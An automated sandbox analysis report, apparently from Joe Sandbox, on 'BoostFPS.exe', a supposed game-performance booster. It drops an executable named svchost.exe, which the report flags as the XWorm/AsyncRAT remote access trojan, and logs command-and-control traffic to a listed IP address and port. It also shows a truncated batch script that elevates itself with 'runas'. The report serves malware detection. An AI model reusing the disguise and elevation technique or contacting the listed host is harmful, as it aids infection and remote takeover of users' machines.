                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6752
                                                      Entropy (8bit):5.504203031382958
                                                      Encrypted:false
                                                      SSDEEP:96:U1wM477Tq51SS9psSmFsGe1+7zb8lpoCQFZNZuMSwCw0wCZeBWBgKrafGn:iwb77TqLSCpk9e1+7zb8jorZLxZG
                                                      MD5:73FA858851AB9F0CB193111D183A3BA5
                                                      SHA1:3B6B20D02CE3E39A45B94984D150009E6EA501CB
                                                      SHA-256:C63A1B8C63ACB2C4CAB3617934A7A88A7B7DC19A2A1144B7F1B1207FF95F26BB
                                                      SHA-512:A08237EFF698B5FEE0909D1FC71A317D64408FD6CCE378A259F7D3AC52577A927B553A10182D5D6552868D21A41A961760F49A987BBBAEADABEFEEE659457BA4
                                                      Malicious:false
                                                      Preview:....@echo Off..Mode 100,25.. title Free Fps MPro..:bitch.. chcp 65001........if %errorlevel% neq 0 start "" /wait /I /min powershell -NoProfile -Command start -verb runas "'%~s0'" && exit /b.... ::Blank/Color Character..for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (set "DEL=%%a" & set "COL=%%b")..:menu......cls..ECHO. ..ECHO. %COL%[35m................................................................... ..ECHO. ................................................................... ..ECHO. ..............................................
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 20 08:37:03 2024, mtime=Wed Nov 20 08:37:03 2024, atime=Wed Nov 20 08:37:03 2024, length=78848, window=hide
                                                      Category:dropped
                                                      Size (bytes):765
                                                      Entropy (8bit):5.050321330831363
                                                      Encrypted:false
                                                      SSDEEP:12:8s24f4QM88CZlsY//w8cS0Lkx0N4fjANNHkZCVmV:82f4QH86ZWqANSYVm
                                                      MD5:74F78E4AF70BC5920AD649565109A74C
                                                      SHA1:02D1C119AECFCCB1B553D453C82C1F710A452C0E
                                                      SHA-256:A35BFE484CF2B5518D821F6C7145D014D73CB17F06649A10B0AB810524474656
                                                      SHA-512:50CB1326994937D33182D01758EE51F3FA240CE451E7F308EF6526C59EF834A3AC99CB05F969858FFDD8B598A8CAFAC868C86AE6CDB4FA3D756E5AEE3234AE4F
                                                      Malicious:false
                                                      Preview:L..................F.... ....X~./;..b../;...X~./;...4......................v.:..DG..Yr?.D..U..k0.&...&...... M........./;.... ./;......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSltY.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....tY.L..Roaming.@......DWSltY.L....C.......................e.R.o.a.m.i.n.g.....b.2..4..tY.L .svchost.exe.H......tY.LtY.L............................e.s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y.............f......C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......745773...........hT..CrF.f4... .7...#....,...W..hT..CrF.f4... .7...#....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):78848
                                                      Entropy (8bit):5.954087952004513
                                                      Encrypted:false
                                                      SSDEEP:1536:GVi5NpODHk+B8tsOR88XChEab22lteZrITX6RL99OWzFXgqr:x5zODHkvt7hChEab22nkIToZ9OoFXNr
                                                      MD5:A50564ADE45C0A409BB38C06673D6AB9
                                                      SHA1:91FD3510C4CCDC50D0EB08249C945271171D5F9F
                                                      SHA-256:120B13C9EDBD9F2FFF0CA2E31EFB17CEF3CAC1EA1B4025E8BC7B512F74021A6E
                                                      SHA-512:7FB99769609027E850C5D6D69912B5DFE82025F24947FA9BFF8D88A966FFDA315DEE8C77086EF171CF75089B6B4D6CB98975B53CBBA040C40AF50248C4F65CD0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 84%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h.(g.................*...........H... ...`....@.. ....................................@.................................XH..S....`............................................................................... ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H........b..........&.....................................................(....*.r...p*. ...*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r...p*. S...*.r0..p*.rp..p*. m.`.*.r...p*. .s..*.r...p*. .x!.*..((...*.r...p*. .u..*.r>..p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ].b.*.r...p*. ..e.*.r...p*. ...*.r...p*. .(T.*.r...p*.r...p*. .9..*.r...p*. ~.H.*.r..
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.872837502974606
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:BoostFPS.exe
                                                      File size:100'352 bytes
                                                      MD5:20f5290def51514fefaed2b744ed961c
                                                      SHA1:546f5c611c1d35c5104e2792c76934746f637987
                                                      SHA256:3e6f0de70c94df15b3aecb8ce4370e26b62fa38a24bf3710d0d9f0a28b4da656
                                                      SHA512:578c4cc3b0375587d13f4b6f28d063322aa4df1dc3a439bc2f22da57475d191b78f7cc6590483ba4462af5a70d7aa73fb6784ae527e46f8e64cb31b3274ef3e2
                                                      SSDEEP:3072:gZtcSVYnM7ByozguHogUDqGB5xY7iBCYs9:gXFyaByoUuInqs0
                                                      TLSH:0DA3F1EE27A5D82ECCE121B25828910E436F4F8399E71F2F24C92A29F011B705D77D75
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.(g.................~............... ........@.. ....................................@................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x419d2e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x67280E30 [Sun Nov 3 23:58:40 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19cdc | 0x4f | .text
                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x4ee | .rsrc
                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c000 | 0xc | .reloc
                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                       .text | 0x2000 | 0x17d34 | 0x17e00 | 349b1b364916a0c9d9e9bed83bc52953 | False | 0.9421118291884817 | data | 7.926723027968396 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                       .rsrc | 0x1a000 | 0x4ee | 0x600 | ce857e2d91ee54d5b2dcc147ff0a4b47 | False | 0.3828125 | data | 3.8231981222590274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .reloc | 0x1c000 | 0xc | 0x200 | 4bffdc894b17403c14e8d6246447683f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                       RT_VERSION | 0x1a0a0 | 0x264 | data | | | 0.47058823529411764
                                                       RT_MANIFEST | 0x1a304 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                       DLL | Import
                                                       mscoree.dll | _CorExeMain
                                                       Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                       2024-11-20T10:38:22.520365+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
                                                       2024-11-20T10:38:23.025464+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:38:23.234175+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
                                                       2024-11-20T10:38:30.155148+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:38:30.155148+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:38:37.774760+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:38:37.779144+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
                                                       2024-11-20T10:38:52.524533+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:38:52.684134+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
                                                       2024-11-20T10:39:00.152420+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:39:00.152420+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:39:07.971525+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
                                                       2024-11-20T10:39:07.972978+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Nov 20, 2024 10:37:08.379210949 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:37:08.390538931 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                                       Nov 20, 2024 10:37:08.390616894 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:37:08.391427994 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:37:08.401712894 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                                       Nov 20, 2024 10:37:08.880258083 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                                       Nov 20, 2024 10:37:08.921600103 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:38:07.696852922 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:07.704927921 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:07.705030918 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:07.776237011 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:07.781169891 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:08.143608093 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                                       Nov 20, 2024 10:38:08.143682957 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:38:22.520365000 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:22.528187037 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:23.025464058 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:23.078115940 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:23.234174967 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:23.239095926 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:30.155148029 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:30.203119993 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:37.266052008 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:37.270927906 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:37.774760008 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:37.779144049 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:37.784056902 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:48.892179966 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                                       Nov 20, 2024 10:38:48.898353100 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                                       Nov 20, 2024 10:38:52.017630100 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:52.022753954 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:52.524533033 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:38:52.583623886 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
